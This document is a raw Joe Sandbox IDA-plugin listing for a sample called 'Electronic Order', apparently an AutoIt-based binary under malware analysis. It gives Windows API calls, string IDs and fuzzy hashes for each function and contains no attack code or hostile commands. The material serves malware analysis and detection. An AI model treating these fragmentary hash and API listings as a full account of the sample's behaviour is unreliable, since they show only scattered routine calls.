                                      • Instruction ID: 60fe9d11b537cf2674c7b3452b29a8a953584ec56dc2213ad62f1d88ade7cbc4
                                      • Opcode Fuzzy Hash: ed8fd987963a17cbc217a7ef6e9e579233a39007fc00b8756fe6c76707222513
                                      • Instruction Fuzzy Hash: 095103786083468FC754CF19C080B1ABBF1BB99358F64985DE9859B361D731EC85CFA2
                                      APIs
                                      • _memset.LIBCMT ref: 00E32892
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E328C8
                                      Strings
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: f2a89882e8e2daf20c4e26981abe01d7052f89ce977fa431c9849cb5be9b7747
                                      • Instruction ID: 162657d1b814cd63df26fe53fbb1730a4c6a4536a56a9259654d385e2709628d
                                      • Opcode Fuzzy Hash: f2a89882e8e2daf20c4e26981abe01d7052f89ce977fa431c9849cb5be9b7747
                                      • Instruction Fuzzy Hash: 6D310771C0011AAFCF01AFA5DC89EEEBFB9FF08310F104069F915A6166DA315A56DBB0
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00E46D86
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E46DC2
                                      Strings
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: f47ed4133e877b18630141599a2432ed27f7984816e089ffca24717f7b13efe3
                                      • Instruction ID: e017eea4c87c2005f1f573aed374910b6218f744504e3701742c58756f7d35ca
                                      • Opcode Fuzzy Hash: f47ed4133e877b18630141599a2432ed27f7984816e089ffca24717f7b13efe3
                                      • Instruction Fuzzy Hash: 19319E71610604AEEB109F64DC80FFB73B8FF89724F109619F9A9A7190CA31AC95CB61
                                      APIs
                                      • _memset.LIBCMT ref: 00E22E00
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E22E3B
                                      Strings
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: ca20d3056ee3920b9771f5f9e1ea56796e5fff1cf6f3023393d22d297ab91072
                                      • Instruction ID: c7a9322a2f811f93ebfd33c8367597bdc14ef0fc723d119dc3f62d110af4f77a
                                      • Opcode Fuzzy Hash: ca20d3056ee3920b9771f5f9e1ea56796e5fff1cf6f3023393d22d297ab91072
                                      • Instruction Fuzzy Hash: 37310931600329BBEB269F59E8457EEBBB5FF05304F15106DEA85B71A0D7709944EB20
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E469D0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E469DB
                                      Strings
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 4a8d905bf42eabb5f205bb20128ce63407a896875bafa8cb7102290011f744fb
                                      • Instruction ID: 981b05cd54f19d83c846b3b48e6dfc3f38b4bcdb169b1d3aa6bc7f26cf436eac
                                      • Opcode Fuzzy Hash: 4a8d905bf42eabb5f205bb20128ce63407a896875bafa8cb7102290011f744fb
                                      • Instruction Fuzzy Hash: 8011B271600209AFEF159E14DC80EFB376AEBDA3A8F115125FA58AB290D6B1DC5187A0
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • GetWindowRect.USER32(00000000,?), ref: 00E46EE0
                                      • GetSysColor.USER32(00000012), ref: 00E46EFA
                                      Strings
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: a95dc01f7b23df53ce2eaddd4be9a92fb0e239bdab2448248182b81a6794f013
                                      • Instruction ID: 77e963f5b68762caf0454d08cac1446a6a2b0eabf9edbfd75c930251afb7a9d4
                                      • Opcode Fuzzy Hash: a95dc01f7b23df53ce2eaddd4be9a92fb0e239bdab2448248182b81a6794f013
                                      • Instruction Fuzzy Hash: AF21447662020AAFDB04DFA8DC45AEA7BB8EB09314F005629F955E3250E634E8619B60
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00E46C11
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E46C20
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 1d7c49a5c1f7d48d9d4f331f954484d450e2ad0b780c4ec106257d72aa70e5c9
                                      • Instruction ID: 59be4850200fa43af441f74ce9772555cd958ada2503d44385c7bbc4ca8bcfa6
                                      • Opcode Fuzzy Hash: 1d7c49a5c1f7d48d9d4f331f954484d450e2ad0b780c4ec106257d72aa70e5c9
                                      • Instruction Fuzzy Hash: 2011BC71500208AFEB108E64EC81AFB37A9EB06378F205724F965E71E0C775DC919B61
                                      APIs
                                      • _memset.LIBCMT ref: 00E22F11
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E22F30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 7dbdfd2a2ef20efa78275e9d33df1e12c11676bf4031c265db4f13e40c256df1
                                      • Instruction ID: 2410366860fd2cf58fd7208b78f7cdb0c09c94f03f379ba7a0210e042a38b4e6
                                      • Opcode Fuzzy Hash: 7dbdfd2a2ef20efa78275e9d33df1e12c11676bf4031c265db4f13e40c256df1
                                      • Instruction Fuzzy Hash: 2B11E231E01134BBEB35DB58ED04BA973B9EB01318F0510A9EB48B72A0DBB0AE04D791
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E32520
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E32549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: e6b9529ebcf861f85637bc407641a67076c673ed7e7148aad7f23a9ed9c084cc
                                      • Instruction ID: 0de954326b7fb06a1b2844b0084f14e9f732065460a4052dddb060c9dce4cd14
                                      • Opcode Fuzzy Hash: e6b9529ebcf861f85637bc407641a67076c673ed7e7148aad7f23a9ed9c084cc
                                      • Instruction Fuzzy Hash: 7111A070501225BEDB248F618C9DEFBFF68FF06755F10912EFA85A6040D2706A45DAE2
                                      APIs
                                        • Part of subcall function 00E3830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E380C8,?,00000000,?,?), ref: 00E38322
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • htons.WSOCK32(00000000,?,00000000), ref: 00E38108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: cde72c37cbfeecde7c7da8697782e90df4cd5328dc5ccca80df9721ae7b38edf
                                      • Instruction ID: 0c01ce4c9dc0069cf339a3741502ff7e2fea17ffeaa6e7e9f0b4f7b26c476047
                                      • Opcode Fuzzy Hash: cde72c37cbfeecde7c7da8697782e90df4cd5328dc5ccca80df9721ae7b38edf
                                      • Instruction Fuzzy Hash: CF11CE34200305ABDB20AF64DD8AFEEB764EF44324F10952AF911A7291DA72A855C6A1
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3C26,00E862F8,?,?,?), ref: 00DD0ACE
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • _wcscat.LIBCMT ref: 00E050E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FullNamePath_memmove_wcscat
                                      • String ID: c
                                      • API String ID: 257928180-921687731
                                      • Opcode ID: bd2fe89cb59a26f221b3ee5d77b9ffac1a9d95ed845e95cb1150e4cb21bb3aa7
                                      • Instruction ID: bb6a16c4486dc889dcccb054c50a2c5f826db637942d8bac832e8eb856582d8e
                                      • Opcode Fuzzy Hash: bd2fe89cb59a26f221b3ee5d77b9ffac1a9d95ed845e95cb1150e4cb21bb3aa7
                                      • Instruction Fuzzy Hash: 421165359042099B8B11FB74DC02F9D77B8EF88354F0140A7B99DE7251EA70DA888B31
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E19355
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: c16df6272bfcaea258246bd3809fcadaf97c86b3698a6f97465a3b84a1f48c74
                                      • Instruction ID: c61d2152baa60f13996ad7b34e45fc7528230c4149d28ade207f607a98154282
                                      • Opcode Fuzzy Hash: c16df6272bfcaea258246bd3809fcadaf97c86b3698a6f97465a3b84a1f48c74
                                      • Instruction Fuzzy Hash: 5101DE71A01215AB8B04EBA0CCA1DFE73A9FF06320B101659F832A72D2DB3169488670
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E1924D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 33232afe91ba6bed16acd8487e2a0be7ef5f451a516e57b4150f61c9289be95d
                                      • Instruction ID: f47ae7c8be24602e7335ab1184ab0e29e631a503c564cfdc0d2e6a7df99ae038
                                      • Opcode Fuzzy Hash: 33232afe91ba6bed16acd8487e2a0be7ef5f451a516e57b4150f61c9289be95d
                                      • Instruction Fuzzy Hash: B9018471A41205BBCB04EBA0D9A2EFF73A8DF05340F141159B91677292EA216E4CD6B1
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E192D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: d3a682f47d27cbd00fe09edca30c4dec6d82e0ad3c07f4ba68192a192675592e
                                      • Instruction ID: fe3c491961f4def0a38f3ca11842aa4ba3714f0a11821dbd35bb20ce4550c59e
                                      • Opcode Fuzzy Hash: d3a682f47d27cbd00fe09edca30c4dec6d82e0ad3c07f4ba68192a192675592e
                                      • Instruction Fuzzy Hash: 3E01F271A41209BBCB00EAA0D892EFF73ECDF05340F241019B802B3292DA216E4C9671
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __calloc_crt
                                      • String ID: @R
                                      • API String ID: 3494438863-2347139750
                                      • Opcode ID: 5ca69b129076c78a623b29dbc88eab86e6a5848024c4e9cd5e26956856ec3e3e
                                      • Instruction ID: 6f191b7bd9a9f243929d4286b45cc11a88ae690e0390a530f818098d62083d28
                                      • Opcode Fuzzy Hash: 5ca69b129076c78a623b29dbc88eab86e6a5848024c4e9cd5e26956856ec3e3e
                                      • Instruction Fuzzy Hash: BCF04F71308656DFE724EB6BBE016612795EB60770F544466E108EA2E0EB30C88597B0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 081f9f1ce70df5ab27c088b6d0f33b00d80d396992b4f33f94f9b112fc692382
                                      • Instruction ID: f6bdb19fdcd5eae2fc62302172254e3f92bae0ff02e07460ad9cbf3ef756e43e
                                      • Opcode Fuzzy Hash: 081f9f1ce70df5ab27c088b6d0f33b00d80d396992b4f33f94f9b112fc692382
                                      • Instruction Fuzzy Hash: 53E02B335003285BD710A696AC09AA7F7ACEB41721F000067F914E3050E560990587E0
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E181CA
                                        • Part of subcall function 00DE3598: _doexit.LIBCMT ref: 00DE35A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 08a3b801d799fcaaf0e925a5e098b2085ed094188836043a82eb57e3ff573dac
                                      • Instruction ID: da8e00a4552e6bbf777557fc4ce9b456eb1dd3400f215b26d93e32e922072272
                                      • Opcode Fuzzy Hash: 08a3b801d799fcaaf0e925a5e098b2085ed094188836043a82eb57e3ff573dac
                                      • Instruction Fuzzy Hash: 8BD02B323C135832D21433A52C0BFC576488F05F12F004415FB0C765C38DD288C242F8
                                      APIs
                                        • Part of subcall function 00DFB564: _memset.LIBCMT ref: 00DFB571
                                        • Part of subcall function 00DE0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DFB540,?,?,?,00DC100A), ref: 00DE0B89
                                      • IsDebuggerPresent.KERNEL32(?,?,?,00DC100A), ref: 00DFB544
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DC100A), ref: 00DFB553
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DFB54E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: ea1aca5282a6ebaa76f6afcf47d87293629786cc8c0e1a866a6c1fceb51cb254
                                      • Instruction ID: 91acb339aa7a14a59259b06db80d2338a4f8aa77f4cecc2f7532ca0a877590cd
                                      • Opcode Fuzzy Hash: ea1aca5282a6ebaa76f6afcf47d87293629786cc8c0e1a866a6c1fceb51cb254
                                      • Instruction Fuzzy Hash: F2E06D742007158FD721DF2AE4087527BE0EB00B68F05C92EE546D7360DBB9D448CB71
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E45BF5
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E45C08
                                        • Part of subcall function 00E254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E2555E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: 07373ab2a0553efb5607f401fc0c5c65eb04595ebb3dbedd72c53125a1a9789b
                                      • Instruction ID: a5e3d49ebacfa9590af024cd71dd0160ad0af3a70c5d915550d742a975b151ee
                                      • Opcode Fuzzy Hash: 07373ab2a0553efb5607f401fc0c5c65eb04595ebb3dbedd72c53125a1a9789b
                                      • Instruction Fuzzy Hash: D3D0A936388310BAE334BB30AC0BF976A10AB01B00F010834B20ABA0D0C8E45801C240